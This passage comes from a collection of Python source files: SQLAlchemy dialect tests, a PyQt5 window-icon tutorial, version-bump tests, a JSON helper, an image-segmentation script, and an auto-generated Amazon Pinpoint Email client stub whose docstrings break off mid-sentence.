metadata.drop_all(engine_testaccount)\n assert mock_method.call_count > 0 # Make sure we actually mocked the issue happening\n assert outcome\n\n\ndef test_too_many_columns_detection(engine_testaccount, db_parameters):\n \"\"\"This tests whether a too many column error actually triggers the more granular table version\"\"\"\n # Set up a single table\n metadata = MetaData()\n Table('users', metadata,\n Column('id', Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name', String),\n Column('fullname', String),\n Column('password', String)\n )\n metadata.create_all(engine_testaccount)\n inspector = inspect(engine_testaccount)\n # Do test\n original_execute = inspector.bind.execute\n\n def mock_helper(command, *args, **kwargs):\n if '_get_schema_columns' in command:\n raise ProgrammingError(\"Information schema query returned too much data. Please repeat query with more \"\n \"selective predicates.\", 90030)\n else:\n return original_execute(command, *args, **kwargs)\n\n with patch.object(inspector.bind, 'execute', side_effect=mock_helper):\n column_metadata = inspector.get_columns('users', db_parameters['schema'])\n assert len(column_metadata) == 4\n # Clean up\n metadata.drop_all(engine_testaccount)\n\n\ndef test_empty_comments(engine_testaccount):\n \"\"\"Test that no comment returns None\"\"\"\n table_name = ''.join(random.choice(string.ascii_uppercase) for _ in range(5))\n try:\n engine_testaccount.execute(\"create table public.{} (\\\"col1\\\" text);\".format(table_name))\n engine_testaccount.execute(\"select comment from information_schema.columns where table_name='{}'\".format(table_name)).fetchall()\n inspector = inspect(engine_testaccount)\n columns = inspector.get_columns(table_name, schema='PUBLIC')\n assert inspector.get_table_comment(table_name, schema='PUBLIC') == {'text': None}\n assert all([c['comment'] is None for c in columns])\n finally:\n engine_testaccount.execute(\"drop table public.{}\".format(table_name))\n"} {"ext": "py", "sha": "1a2fd9b881bcb20c6a7d72e836aff2941ba30a0c", "content": "\"\"\"\r\nZetCode PyQt5 tutorial \r\n\r\nThis example shows an icon\r\nin the titlebar of the window.\r\n\r\nAuthor: Jan Bodnar\r\nWebsite: zetcode.com \r\nLast edited: August 2017\r\n\"\"\"\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import QApplication, QWidget\r\nfrom PyQt5.QtGui import QIcon\r\n\r\n\r\nclass Example(QWidget):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n\r\n self.initUI()\r\n\r\n\r\n def initUI(self):\r\n\r\n self.setGeometry(300, 300, 300, 220)\r\n self.setWindowTitle('Icon')\r\n self.setWindowIcon(QIcon('web.png')) \r\n\r\n self.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n sys.exit(app.exec_())"} {"ext": "py", "sha": "1a2fdb0ecb858371470a0abd13011cb82b8f8dc1", "content": "# Copyright (c) Microsoft Corporation. 
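# --- Illustrative aside (toy objects, no database): the mocking pattern used by
# test_too_many_columns_detection above, i.e. patch.object(..., side_effect=helper)
# where the helper raises for one specific input and otherwise forwards to the
# original callable. This is how the test forces the "too much data" error path
# without building a huge schema.
from unittest.mock import patch


class _Executor:
    def execute(self, command):
        return 'ran: ' + command


_executor = _Executor()
_original_execute = _executor.execute


def _mock_helper(command, *args, **kwargs):
    if 'trigger_error' in command:
        raise RuntimeError('simulated failure for %r' % command)
    return _original_execute(command, *args, **kwargs)


with patch.object(_executor, 'execute', side_effect=_mock_helper):
    print(_executor.execute('normal query'))          # forwarded to the real method
    try:
        _executor.execute('trigger_error query')
    except RuntimeError as exc:
        print('caught:', exc)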
All rights reserved.\n# Licensed under the MIT License.\n\nimport json\n\nimport freezegun\nimport pytest\nimport update_ext_version\n\nTEST_DATETIME = \"2022-03-14 01:23:45\"\n\n# The build ID is calculated via:\n# \"1\" + datetime.datetime.strptime(TEST_DATETIME,\"%Y-%m-%d %H:%M:%S\").strftime('%j%H%M')\nEXPECTED_BUILD_ID = \"10730123\"\n\n\ndef create_package_json(directory, version):\n \"\"\"Create `package.json` in `directory` with a specified version of `version`.\"\"\"\n package_json = directory / \"package.json\"\n package_json.write_text(json.dumps({\"version\": version}), encoding=\"utf-8\")\n return package_json\n\n\ndef run_test(tmp_path, version, args, expected):\n package_json = create_package_json(tmp_path, version)\n update_ext_version.main(package_json, args)\n package = json.loads(package_json.read_text(encoding=\"utf-8\"))\n assert expected == update_ext_version.parse_version(package[\"version\"])\n\n\n@pytest.mark.parametrize(\n \"version, args\",\n [\n (\"1.0.0-rc\", []),\n (\"1.1.0-rc\", [\"--release\"]),\n (\"1.0.0-rc\", [\"--release\", \"--build-id\", \"-1\"]),\n (\"1.0.0-rc\", [\"--release\", \"--for-publishing\", \"--build-id\", \"-1\"]),\n (\"1.0.0-rc\", [\"--release\", \"--for-publishing\", \"--build-id\", \"999999999999\"]),\n (\"1.1.0-rc\", [\"--build-id\", \"-1\"]),\n (\"1.1.0-rc\", [\"--for-publishing\", \"--build-id\", \"-1\"]),\n (\"1.1.0-rc\", [\"--for-publishing\", \"--build-id\", \"999999999999\"]),\n ],\n)\ndef test_invalid_args(tmp_path, version, args):\n with pytest.raises(ValueError):\n run_test(tmp_path, version, args, None)\n\n\n@pytest.mark.parametrize(\n \"version, args, expected\",\n [\n (\"1.1.0-rc\", [\"--build-id\", \"12345\"], (\"1\", \"1\", \"12345\", \"rc\")),\n (\"1.0.0-rc\", [\"--release\", \"--build-id\", \"12345\"], (\"1\", \"0\", \"12345\", \"\")),\n (\n \"1.1.0-rc\",\n [\"--for-publishing\", \"--build-id\", \"12345\"],\n (\"1\", \"1\", \"12345\", \"\"),\n ),\n (\n \"1.0.0-rc\",\n [\"--release\", \"--for-publishing\", \"--build-id\", \"12345\"],\n (\"1\", \"0\", \"12345\", \"\"),\n ),\n (\n \"1.0.0-rc\",\n [\"--release\", \"--build-id\", \"999999999999\"],\n (\"1\", \"0\", \"999999999999\", \"\"),\n ),\n (\n \"1.1.0-rc\",\n [\"--build-id\", \"999999999999\"],\n (\"1\", \"1\", \"999999999999\", \"rc\"),\n ),\n (\"1.1.0-rc\", [], (\"1\", \"1\", EXPECTED_BUILD_ID, \"rc\")),\n (\n \"1.0.0-rc\",\n [\"--release\"],\n (\"1\", \"0\", \"0\", \"\"),\n ),\n (\n \"1.1.0-rc\",\n [\"--for-publishing\"],\n (\"1\", \"1\", EXPECTED_BUILD_ID, \"\"),\n ),\n (\n \"1.0.0-rc\",\n [\"--release\", \"--for-publishing\"],\n (\"1\", \"0\", \"0\", \"\"),\n ),\n (\n \"1.0.0-rc\",\n [\"--release\"],\n (\"1\", \"0\", \"0\", \"\"),\n ),\n (\n \"1.1.0-rc\",\n [],\n (\"1\", \"1\", EXPECTED_BUILD_ID, \"rc\"),\n ),\n ],\n)\n@freezegun.freeze_time(\"2022-03-14 01:23:45\")\ndef test_update_ext_version(tmp_path, version, args, expected):\n run_test(tmp_path, version, args, expected)\n"} {"ext": "py", "sha": "1a2fdb91f2a3778bbd6edcb216c365f3b450590c", "content": "import simplejson as json \nfrom collections import namedtuple\n\ndef json2obj(data):\n return json.loads(data, object_hook=_json_object_hook)\n\ndef _json_object_hook(dobj):\n dobj['json_dict'] = dobj.copy()\n X = namedtuple('X', dobj.keys(), rename=True)\n X.remove = lambda x: None\n return(X(*dobj.values()))\n"} {"ext": "py", "sha": "1a2fdccfb072d8e8a94167ef8fee28278425beb9", "content": "from core.project.project import Project\nfrom core.graph.region_chunk import RegionChunk\nimport numpy as np\nimport 
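# --- Illustrative aside: the EXPECTED_BUILD_ID constant above can be reproduced
# directly from the formula quoted in its comment; this snippet just evaluates
# it so the "10730123" literal is easy to verify (2022-03-14 is day 073 of the
# year, and 01:23 is the hour/minute portion).
import datetime

_TEST_DATETIME = "2022-03-14 01:23:45"
_build_id = "1" + datetime.datetime.strptime(
    _TEST_DATETIME, "%Y-%m-%d %H:%M:%S").strftime('%j%H%M')
print(_build_id)                    # 10730123
assert _build_id == "10730123"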
matplotlib.pyplot as plt\n\nfrom skimage.segmentation import random_walker\nfrom skimage.data import binary_blobs\nimport skimage\n\nif __name__ == '__main__':\n p = Project()\n p.load('/Users/flipajs/Documents/wd/FERDA/Cam1_')\n\n ch = p.chm[257]\n\n rch = RegionChunk(ch, p.gm, p.rm)\n start_vertex = ch.start_vertex()\n\n in_regions = []\n for n in start_vertex.in_neighbors():\n r = p.gm.region(n)\n in_regions.append(r)\n\n r = rch[0]\n r.frame()\n\n from utils.video_manager import get_auto_video_manager\n from skimage.morphology import skeletonize_3d\n import cv2\n\n vm = get_auto_video_manager(p)\n\n # TODO: idea - label erosion before each nex iteration...\n from scipy.ndimage.morphology import binary_erosion\n\n whole_labels = None\n for r1 in rch.regions_gen():\n markers = np.zeros((1000, 1000), dtype=np.int32)\n r1_im = np.zeros((1000, 1000), dtype=np.bool)\n r1_im[r1.pts()[:, 0], r1.pts()[:, 1]] = True\n markers[np.logical_not(r1_im)] = -1\n\n img = vm.get_frame(r1.frame())\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n for i, r in enumerate(in_regions):\n if whole_labels is None:\n im2 = np.zeros((1000, 1000), dtype=np.bool)\n im2[r.pts()[:, 0], r.pts()[:, 1]] = True\n\n markers[np.logical_and(r1_im, im2)] = i+1\n else:\n l_ = whole_labels==i+1\n l_ = binary_erosion(l_, iterations=5)\n markers[np.logical_and(r1_im, l_)] = i+1\n\n tl = r1.roi().top_left_corner()\n br = r1.roi().bottom_right_corner()\n gray = gray[tl[0]:br[0], tl[1]:br[1]].copy()\n markers = markers[tl[0]:br[0], tl[1]:br[1]].copy()\n r1_im = r1_im[tl[0]:br[0], tl[1]:br[1]].copy()\n skel = skeletonize_3d(r1_im)\n\n data=np.asarray(r1_im, dtype=np.uint8)*255\n labels = random_walker(gray, markers, beta=500000, mode='bf')\n\n whole_labels = np.zeros((1000, 1000), dtype=np.int32)\n whole_labels[tl[0]:br[0], tl[1]:br[1]] = labels.copy()\n\n # Plot results\n fig, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4, figsize=(8, 3.2), sharex=True, sharey=True)\n ax1.imshow(gray, cmap='gray', interpolation='nearest')\n ax1.axis('off')\n ax1.set_adjustable('box-forced')\n ax1.set_title('Noisy data')\n ax2.imshow(markers, cmap='hot', interpolation='nearest')\n ax2.axis('off')\n ax2.set_adjustable('box-forced')\n ax2.set_title('Markers')\n ax3.imshow(labels, cmap='hot', interpolation='nearest')\n ax3.axis('off')\n ax3.set_adjustable('box-forced')\n ax3.set_title('Segmentation')\n ax4.imshow(skel)\n ax4.axis('off')\n ax4.set_adjustable('box-forced')\n ax4.set_title('skeleton')\n\n\n fig.subplots_adjust(hspace=0.01, wspace=0.01, top=1, bottom=0, left=0,\n right=1)\n plt.show()\n plt.ion()\n plt.waitforbuttonpress()\n plt.close()\n\n\n\n\n"} {"ext": "py", "sha": "1a2fdcd2a8cab6de6db5933a0757a8beb063ac74", "content": "from typing import Optional\nfrom botocore.client import BaseClient\nfrom typing import Dict\nfrom botocore.paginate import Paginator\nfrom datetime import datetime\nfrom botocore.waiter import Waiter\nfrom typing import Union\nfrom typing import List\n\n\nclass Client(BaseClient):\n def can_paginate(self, operation_name: str = None):\n \"\"\"\n Check if an operation can be paginated.\n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. 
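# --- Illustrative aside (synthetic data, no project files needed): a toy
# version of the random-walker step used in the tracking script above. One
# marker is seeded inside each of two blobs, everything outside the foreground
# is marked inactive (-1, removed from the graph), and random_walker assigns the
# remaining foreground pixels to one of the two seeds. beta and mode follow the
# same call style as the script, with a smaller beta for the toy image.
import numpy as np
from skimage.segmentation import random_walker

_img = np.zeros((60, 60), dtype=np.uint8)
_img[10:30, 10:30] = 200      # blob 1
_img[25:50, 35:55] = 120      # blob 2
_foreground = _img > 0

_markers = np.zeros(_img.shape, dtype=np.int32)
_markers[~_foreground] = -1   # inactive pixels
_markers[15, 15] = 1          # seed inside blob 1
_markers[40, 45] = 2          # seed inside blob 2

_labels = random_walker(_img, _markers, beta=500, mode='bf')
print(np.unique(_labels))     # foreground pixels are assigned label 1 or 2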
For example, if the\n method name is ``create_foo``, and you\\'d normally invoke the\n operation as ``client.create_foo(**kwargs)``, if the\n ``create_foo`` operation can be paginated, you can use the\n call ``client.get_paginator(\\\"create_foo\\\")``.\n :return: ``True`` if the operation can be paginated,\n ``False`` otherwise.\n \"\"\"\n pass\n\n def create_configuration_set(self, ConfigurationSetName: str = None, TrackingOptions: Dict = None, DeliveryOptions: Dict = None, ReputationOptions: Dict = None, SendingOptions: Dict = None, Tags: List = None) -> Dict:\n \"\"\"\n Create a configuration set. *Configuration sets* are groups of rules that you can apply to the emails you send using Amazon Pinpoint. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email. \n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.create_configuration_set(\n ConfigurationSetName='string',\n TrackingOptions={\n 'CustomRedirectDomain': 'string'\n },\n DeliveryOptions={\n 'SendingPoolName': 'string'\n },\n ReputationOptions={\n 'ReputationMetricsEnabled': True|False,\n 'LastFreshStart': datetime(2015, 1, 1)\n },\n SendingOptions={\n 'SendingEnabled': True|False\n },\n Tags=[\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName:\n The name of the configuration set.\n :type TrackingOptions: dict\n :param TrackingOptions:\n An object that defines the open and click tracking options for emails that you send using the configuration set.\n - **CustomRedirectDomain** *(string) --* **[REQUIRED]**\n The domain that you want to use for tracking open and click events.\n :type DeliveryOptions: dict\n :param DeliveryOptions:\n An object that defines the dedicated IP pool that is used to send emails that you send using the configuration set.\n - **SendingPoolName** *(string) --*\n The name of the dedicated IP pool that you want to associate with the configuration set.\n :type ReputationOptions: dict\n :param ReputationOptions:\n An object that defines whether or not Amazon Pinpoint collects reputation metrics for the emails that you send that use the configuration set.\n - **ReputationMetricsEnabled** *(boolean) --*\n If ``true`` , tracking of reputation metrics is enabled for the configuration set. If ``false`` , tracking of reputation metrics is disabled for the configuration set.\n - **LastFreshStart** *(datetime) --*\n The date and time (in Unix time) when the reputation metrics were last given a fresh start. When your account is given a fresh start, your reputation metrics are calculated starting from the date of the fresh start.\n :type SendingOptions: dict\n :param SendingOptions:\n An object that defines whether or not Amazon Pinpoint can send email that you send using the configuration set.\n - **SendingEnabled** *(boolean) --*\n If ``true`` , email sending is enabled for the configuration set. 
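# --- Illustrative usage sketch for create_configuration_set, following the
# Request Syntax documented above. The boto3 service name ('pinpoint-email'),
# region, and all resource names are illustrative placeholders, not values
# taken from this stub.
import boto3

_client = boto3.client('pinpoint-email', region_name='us-east-1')

_response = _client.create_configuration_set(
    ConfigurationSetName='my-config-set',
    TrackingOptions={'CustomRedirectDomain': 'tracking.example.com'},
    ReputationOptions={'ReputationMetricsEnabled': True},
    SendingOptions={'SendingEnabled': True},
    Tags=[{'Key': 'Stack', 'Value': 'Test'}],
)
print(_response)    # an empty dict on an HTTP 200 response, per the docs above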
If ``false`` , email sending is disabled for the configuration set.\n :type Tags: list\n :param Tags:\n An object that defines the tags (keys and values) that you want to associate with the configuration set.\n - *(dict) --*\n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive.\n * For each associated resource, each tag key must be unique and it can have only one value.\n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can\\'t edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource.\n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account.\n - **Key** *(string) --* **[REQUIRED]**\n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* **[REQUIRED]**\n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def create_configuration_set_event_destination(self, ConfigurationSetName: str, EventDestinationName: str, EventDestination: Dict) -> Dict:\n \"\"\"\n Create an event destination. In Amazon Pinpoint, *events* include message sends, deliveries, opens, clicks, bounces, and complaints. *Event destinations* are places that you can send information about these events to. 
For example, you can send event data to Amazon SNS to receive notifications when you receive bounces or complaints, or you can use Amazon Kinesis Data Firehose to stream data to Amazon S3 for long-term storage.\n A single configuration set can include more than one event destination.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.create_configuration_set_event_destination(\n ConfigurationSetName='string',\n EventDestinationName='string',\n EventDestination={\n 'Enabled': True|False,\n 'MatchingEventTypes': [\n 'SEND'|'REJECT'|'BOUNCE'|'COMPLAINT'|'DELIVERY'|'OPEN'|'CLICK'|'RENDERING_FAILURE',\n ],\n 'KinesisFirehoseDestination': {\n 'IamRoleArn': 'string',\n 'DeliveryStreamArn': 'string'\n },\n 'CloudWatchDestination': {\n 'DimensionConfigurations': [\n {\n 'DimensionName': 'string',\n 'DimensionValueSource': 'MESSAGE_TAG'|'EMAIL_HEADER'|'LINK_TAG',\n 'DefaultDimensionValue': 'string'\n },\n ]\n },\n 'SnsDestination': {\n 'TopicArn': 'string'\n },\n 'PinpointDestination': {\n 'ApplicationArn': 'string'\n }\n }\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to add an event destination to.\n :type EventDestinationName: string\n :param EventDestinationName: **[REQUIRED]**\n A name that identifies the event destination within the configuration set.\n :type EventDestination: dict\n :param EventDestination: **[REQUIRED]**\n An object that defines the event destination.\n - **Enabled** *(boolean) --*\n If ``true`` , the event destination is enabled. When the event destination is enabled, the specified event types are sent to the destinations in this ``EventDestinationDefinition`` .\n If ``false`` , the event destination is disabled. When the event destination is disabled, events aren\\'t sent to the specified destinations.\n - **MatchingEventTypes** *(list) --*\n An array that specifies which events Amazon Pinpoint should send to the destinations in this ``EventDestinationDefinition`` .\n - *(string) --*\n An email sending event type. For example, email sends, opens, and bounces are all email events.\n - **KinesisFirehoseDestination** *(dict) --*\n An object that defines an Amazon Kinesis Data Firehose destination for email events. You can use Amazon Kinesis Data Firehose to stream data to other services, such as Amazon S3 and Amazon Redshift.\n - **IamRoleArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the IAM role that Amazon Pinpoint uses when sending email events to the Amazon Kinesis Data Firehose stream.\n - **DeliveryStreamArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the Amazon Kinesis Data Firehose stream that Amazon Pinpoint sends email events to.\n - **CloudWatchDestination** *(dict) --*\n An object that defines an Amazon CloudWatch destination for email events. 
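# --- Illustrative usage sketch: adding an Amazon SNS event destination to a
# configuration set, following the Request Syntax documented above. Only the
# fields relevant to an SNS destination are filled in; the configuration set
# name and topic ARN are placeholders.
import boto3

_client = boto3.client('pinpoint-email', region_name='us-east-1')

_client.create_configuration_set_event_destination(
    ConfigurationSetName='my-config-set',
    EventDestinationName='bounce-and-complaint-alerts',
    EventDestination={
        'Enabled': True,
        'MatchingEventTypes': ['BOUNCE', 'COMPLAINT'],
        'SnsDestination': {
            # placeholder ARN
            'TopicArn': 'arn:aws:sns:us-east-1:123456789012:email-events',
        },
    },
)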
You can use Amazon CloudWatch to monitor and gain insights on your email sending metrics.\n - **DimensionConfigurations** *(list) --* **[REQUIRED]**\n An array of objects that define the dimensions to use when you send email events to Amazon CloudWatch.\n - *(dict) --*\n An object that defines the dimension configuration to use when you send Amazon Pinpoint email events to Amazon CloudWatch.\n - **DimensionName** *(string) --* **[REQUIRED]**\n The name of an Amazon CloudWatch dimension associated with an email sending metric. The name has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n - **DimensionValueSource** *(string) --* **[REQUIRED]**\n The location where Amazon Pinpoint finds the value of a dimension to publish to Amazon CloudWatch. If you want Amazon Pinpoint to use the message tags that you specify using an X-SES-MESSAGE-TAGS header or a parameter to the SendEmail/SendRawEmail API, choose ``messageTag`` . If you want Amazon Pinpoint to use your own email headers, choose ``emailHeader`` . If you want Amazon Pinpoint to use link tags, choose ``linkTags`` .\n - **DefaultDimensionValue** *(string) --* **[REQUIRED]**\n The default value of the dimension that is published to Amazon CloudWatch if you don\\'t provide the value of the dimension when you send an email. This value has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n - **SnsDestination** *(dict) --*\n An object that defines an Amazon SNS destination for email events. You can use Amazon SNS to send notification when certain email events occur.\n - **TopicArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the Amazon SNS topic that you want to publish email events to. For more information about Amazon SNS topics, see the `Amazon SNS Developer Guide `__ .\n - **PinpointDestination** *(dict) --*\n An object that defines a Amazon Pinpoint destination for email events. You can use Amazon Pinpoint events to create attributes in Amazon Pinpoint projects. You can use these attributes to create segments for your campaigns.\n - **ApplicationArn** *(string) --*\n The Amazon Resource Name (ARN) of the Amazon Pinpoint project that you want to send email events to.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def create_dedicated_ip_pool(self, PoolName: str, Tags: List = None) -> Dict:\n \"\"\"\n Create a new pool of dedicated IP addresses. A pool can include one or more dedicated IP addresses that are associated with your Amazon Pinpoint account. You can associate a pool with a configuration set. 
When you send an email that uses that configuration set, Amazon Pinpoint sends it using only the IP addresses in the associated pool.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.create_dedicated_ip_pool(\n PoolName='string',\n Tags=[\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type PoolName: string\n :param PoolName: **[REQUIRED]**\n The name of the dedicated IP pool.\n :type Tags: list\n :param Tags:\n An object that defines the tags (keys and values) that you want to associate with the pool.\n - *(dict) --*\n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive.\n * For each associated resource, each tag key must be unique and it can have only one value.\n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can\\'t edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource.\n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account.\n - **Key** *(string) --* **[REQUIRED]**\n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* **[REQUIRED]**\n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def create_deliverability_test_report(self, FromEmailAddress: str, Content: Dict, ReportName: str = None, Tags: List = None) -> Dict:\n \"\"\"\n Create a new predictive inbox placement test. Predictive inbox placement tests can help you predict how your messages will be handled by various email providers around the world. 
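# --- Illustrative usage sketch for create_dedicated_ip_pool, following the
# Request Syntax documented above; the pool name and tag values are
# placeholders.
import boto3

_client = boto3.client('pinpoint-email', region_name='us-east-1')
_client.create_dedicated_ip_pool(
    PoolName='marketing-pool',
    Tags=[{'Key': 'Stack', 'Value': 'Production'}],
)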
When you perform a predictive inbox placement test, you provide a sample message that contains the content that you plan to send to your customers. Amazon Pinpoint then sends that message to special email addresses spread across several major email providers. After about 24 hours, the test is complete, and you can use the ``GetDeliverabilityTestReport`` operation to view the results of the test.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.create_deliverability_test_report(\n ReportName='string',\n FromEmailAddress='string',\n Content={\n 'Simple': {\n 'Subject': {\n 'Data': 'string',\n 'Charset': 'string'\n },\n 'Body': {\n 'Text': {\n 'Data': 'string',\n 'Charset': 'string'\n },\n 'Html': {\n 'Data': 'string',\n 'Charset': 'string'\n }\n }\n },\n 'Raw': {\n 'Data': b'bytes'\n }\n },\n Tags=[\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n **Response Syntax**\n ::\n {\n 'ReportId': 'string',\n 'DeliverabilityTestStatus': 'IN_PROGRESS'|'COMPLETED'\n }\n \n **Response Structure**\n - *(dict) --* \n Information about the predictive inbox placement test that you created.\n - **ReportId** *(string) --* \n A unique string that identifies the predictive inbox placement test.\n - **DeliverabilityTestStatus** *(string) --* \n The status of the predictive inbox placement test. If the status is ``IN_PROGRESS`` , then the predictive inbox placement test is currently running. Predictive inbox placement tests are usually complete within 24 hours of creating the test. If the status is ``COMPLETE`` , then the test is finished, and you can use the ``GetDeliverabilityTestReport`` to view the results of the test.\n :type ReportName: string\n :param ReportName:\n A unique name that helps you to identify the predictive inbox placement test when you retrieve the results.\n :type FromEmailAddress: string\n :param FromEmailAddress: **[REQUIRED]**\n The email address that the predictive inbox placement test email was sent from.\n :type Content: dict\n :param Content: **[REQUIRED]**\n The HTML body of the message that you sent when you performed the predictive inbox placement test.\n - **Simple** *(dict) --*\n The simple email message. The message consists of a subject and a message body.\n - **Subject** *(dict) --* **[REQUIRED]**\n The subject line of the email. The subject line can only contain 7-bit ASCII characters. However, you can specify non-ASCII characters in the subject line by using encoded-word syntax, as described in `RFC 2047 `__ .\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Body** *(dict) --* **[REQUIRED]**\n The body of the message. You can specify an HTML version of the message, a text-only version of the message, or both.\n - **Text** *(dict) --*\n An object that represents the version of the message that is displayed in email clients that don\\'t support HTML, or clients where the recipient has disabled HTML rendering.\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. 
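# --- Illustrative usage sketch: starting a predictive inbox placement test with
# simple (non-raw) content, following the Request Syntax above. The sender
# address, report name and body text are placeholders. Per the Response Syntax,
# the reply carries a ReportId and a DeliverabilityTestStatus of IN_PROGRESS or
# COMPLETED.
import boto3

_client = boto3.client('pinpoint-email', region_name='us-east-1')
_response = _client.create_deliverability_test_report(
    ReportName='spring-campaign-test',
    FromEmailAddress='sender@example.com',      # placeholder sender address
    Content={
        'Simple': {
            'Subject': {'Data': 'Placement test', 'Charset': 'UTF-8'},
            'Body': {
                'Text': {'Data': 'Plain-text body', 'Charset': 'UTF-8'},
                'Html': {'Data': '<p>HTML body</p>', 'Charset': 'UTF-8'},
            },
        }
    },
)
print(_response['ReportId'], _response['DeliverabilityTestStatus'])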
If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Html** *(dict) --*\n An object that represents the version of the message that is displayed in email clients that support HTML. HTML messages can include formatted text, hyperlinks, images, and more.\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Raw** *(dict) --*\n The raw email message. The message has to meet the following criteria:\n * The message has to contain a header and a body, separated by one blank line.\n * All of the required header fields must be present in the message.\n * Each part of a multipart MIME message must be formatted properly.\n * If you include attachments, they must be in a file format that Amazon Pinpoint supports.\n * The entire message must be Base64 encoded.\n * If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\\' email clients render the message properly.\n * The length of any single line of text in the message can\\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 `__ .\n - **Data** *(bytes) --* **[REQUIRED]**\n The raw email message. The message has to meet the following criteria:\n * The message has to contain a header and a 